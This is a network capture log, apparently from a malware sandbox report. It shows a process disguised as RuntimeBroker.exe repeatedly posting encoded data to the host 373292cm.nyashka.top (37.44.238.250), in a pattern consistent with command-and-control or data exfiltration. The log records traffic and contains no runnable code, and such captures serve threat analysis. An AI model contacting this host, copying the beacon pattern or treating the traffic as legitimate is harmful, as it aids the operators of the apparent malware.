Jan 11, 2025 06:44:31.538243055 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Jan 11, 2025 06:44:31.895436049 CET | 2544 | OUT | Data Raw / Data Ascii: (encoded request body)
Jan 11, 2025 06:44:32.167202950 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:32.335767984 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.6 | 57129 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:32.486602068 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 11, 2025 06:44:32.832834959 CET | 2544 | OUT | Data Raw / Data Ascii: (encoded request body)
Jan 11, 2025 06:44:33.114964008 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:33.242477894 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:33 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.6 | 57130 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:33.366661072 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Jan 11, 2025 06:44:33.723489046 CET | 2544 | OUT | Data Raw / Data Ascii: (encoded request body)
Jan 11, 2025 06:44:33.994847059 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:34.122253895 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:33 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.6 | 57131 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:34.258488894 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 11, 2025 06:44:34.614161015 CET | 2544 | OUT | Data Raw / Data Ascii: (encoded request body)
Jan 11, 2025 06:44:34.903548956 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:35.034363031 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.6 | 57132 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:35.291584969 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 11, 2025 06:44:35.645365953 CET | 2544 | OUT | Data Raw / Data Ascii: (encoded request body)
Jan 11, 2025 06:44:35.923372030 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:36.050525904 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.6 | 57133 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:36.179792881 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  98 | 192.168.2.6 | 57134 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:36.417581081 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:36.770828009 CET | 1872 | OUT | Data Raw: 5f 54 59 52 51 40 54 5f 5b 5f 5a 51 59 5e 58 53 57 5b 5d 5a 57 5e 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _TYRQ@T_[_ZQY^XSW[]ZW^S_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S._,'6- ^7 !>+<9^+-#X#,(!"#+_<#35Y/&F$.Y/
                                                                                  Jan 11, 2025 06:44:37.051211119 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:37.183163881 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:36 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 26 55 29 25 3e 5a 31 05 0a 55 24 0a 2d 0e 2a 2e 3c 01 2b 3d 35 5f 33 5e 35 1a 25 58 2f 0d 24 5d 2d 5a 28 00 2e 19 32 3f 24 05 3a 1e 2b 5d 0c 13 22 59 23 3a 08 10 25 2c 2f 04 3d 3b 3f 5a 20 3f 35 00 2b 04 25 54 3c 3c 24 5f 3f 07 02 02 3f 39 2a 54 2e 28 0f 17 2e 56 2a 1e 20 3e 2b 52 0d 11 24 52 2b 03 39 54 2a 07 2b 15 23 28 3b 5a 24 03 00 50 25 54 32 57 33 2a 23 01 31 32 36 0f 33 1f 2d 12 32 15 36 5b 26 3f 21 55 35 22 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: &U)%>Z1U$-*.<+=5_3^5%X/$]-Z(.2?$:+]"Y#:%,/=;?Z ?5+%T<<$_??9*T.(.V* >+R$R+9T*+#(;Z$P%T2W3*#1263-26[&?!U5"#T,"W3UV


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  99 | 192.168.2.6 | 57135 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:36.548322916 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:36.895361900 CET | 2544 | OUT | Data Raw: 5a 56 59 57 54 45 54 50 5b 5f 5a 51 59 53 58 50 57 58 5d 5c 57 5d 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZVYWTETP[_ZQYSXPWX]\W]S_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.]/ 86.7735)?()+-74?/P 8W+:( %_;>&F$.Y/5
                                                                                  Jan 11, 2025 06:44:37.185903072 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:37.352355957 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:37 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  100 | 192.168.2.6 | 57136 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:37.481817007 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:37.838988066 CET | 2544 | OUT | Data Raw: 5a 57 59 54 54 45 51 5b 5b 5f 5a 51 59 53 58 56 57 50 5d 5b 57 5a 53 5e 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZWYTTEQ[[_ZQYSXVWP][WZS^\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/$!- ^ 0==,_(:+<# 20*90#1,.&F$.Y/5
                                                                                  Jan 11, 2025 06:44:38.125365973 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:38.261291027 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:38 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  101 | 192.168.2.6 | 57137 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:38.451941013 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:38.801670074 CET | 2544 | OUT | Data Raw: 5f 5d 59 53 54 46 54 58 5b 5f 5a 51 59 50 58 56 57 5e 5d 5e 57 5c 53 5a 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _]YSTFTX[_ZQYPXVW^]^W\SZ\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S..306=<_"0\)-^<-=?=87, Q?98#08&F$.Y/
                                                                                  Jan 11, 2025 06:44:39.107403994 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:39.244941950 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:39 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  102 | 192.168.2.6 | 57138 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:39.370022058 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:39.723591089 CET | 2544 | OUT | Data Raw: 5a 56 59 52 54 44 51 59 5b 5f 5a 51 59 55 58 54 57 5f 5d 5d 57 58 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZVYRTDQY[_ZQYUXTW_]]WXSY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-.3;5=$X#0:=4>=)[? /#W#(_;X46/.&F$.Y/-
                                                                                  Jan 11, 2025 06:44:40.002381086 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:40.135035992 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:39 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  103 | 192.168.2.6 | 57139 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:40.259021997 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:40.617530107 CET | 2544 | OUT | Data Raw: 5a 52 5c 56 54 45 54 5e 5b 5f 5a 51 59 53 58 51 57 59 5d 5d 57 5c 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZR\VTET^[_ZQYSXQWY]]W\SU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/ 0"$^"#*)(?=5+<4<# V*) 9.>&F$.Y/5
                                                                                  Jan 11, 2025 06:44:40.905994892 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:41.073771954 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:40 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  104 | 192.168.2.6 | 57140 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:41.205629110 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:41.551637888 CET | 2544 | OUT | Data Raw: 5a 50 59 52 51 42 54 51 5b 5f 5a 51 59 52 58 5f 57 50 5d 53 57 50 53 5a 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZPYRQBTQ[_ZQYRX_WP]SWPSZ\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.X;'5>(_ >-<X)[<'\4Z0 "/?9X#=,.&F$.Y/1
                                                                                  Jan 11, 2025 06:44:41.835292101 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:41.962363958 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:41 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  105 | 192.168.2.6 | 57141 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:42.094012022 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  106 | 192.168.2.6 | 57142 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:42.198781013 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:42.551554918 CET | 1872 | OUT | Data Raw: 5a 56 59 50 54 46 54 5e 5b 5f 5a 51 59 54 58 53 57 50 5d 5f 57 50 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZVYPTFT^[_ZQYTXSWP]_WPS\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S._8<!=8##=>= _?"<-/Z7P!28?:4"0)\8&F$.Y/)
                                                                                  Jan 11, 2025 06:44:42.827688932 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:42.954541922 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 26 11 3e 26 32 5c 25 28 2c 54 25 20 3a 56 29 5b 34 03 3d 03 2e 06 25 28 25 5c 27 2d 27 0e 30 05 00 00 3f 00 08 50 24 2f 3f 5d 39 24 2b 5d 0c 13 22 5f 34 2a 0b 01 32 5a 20 10 29 16 0d 5d 22 12 26 13 28 04 21 16 28 11 3f 01 28 17 3f 59 3f 03 3d 0b 2c 28 2e 04 3a 0e 2d 0e 23 3e 2b 52 0d 11 24 1e 3c 2e 39 56 3d 3e 3b 5f 21 38 09 10 27 13 26 56 31 21 39 0d 24 29 2c 12 26 1c 3e 09 30 0f 36 0d 26 28 2e 1c 32 06 29 56 36 32 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: &>&2\%(,T% :V)[4=.%(%\'-'0?P$/?]9$+]"_4*2Z )]"&(!(?(?Y?=,(.:-#>+R$<.9V=>;_!8'&V1!9$),&>06&(.2)V62#T,"W3UV


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  107 | 192.168.2.6 | 57143 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:42.323111057 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:42.676636934 CET | 2544 | OUT | Data Raw: 5a 51 5c 52 51 43 54 5f 5b 5f 5a 51 59 51 58 56 57 51 5d 5f 57 58 53 54 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZQ\RQCT_[_ZQYQXVWQ]_WXST\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/0,! \7\>,X<-+?7, (<_443%;&F$.Y/=
                                                                                  Jan 11, 2025 06:44:42.972130060 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:43.106369019 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  108 | 192.168.2.6 | 57144 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:43.488631964 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:43.832822084 CET | 2544 | OUT | Data Raw: 5a 55 59 57 54 49 54 50 5b 5f 5a 51 59 50 58 55 57 5f 5d 5b 57 5d 53 5b 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZUYWTITP[_ZQYPXUW_][W]S[\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S..3$6>#" %\=[/+=+ 4Z3 ,?9?]" %\;.&F$.Y/
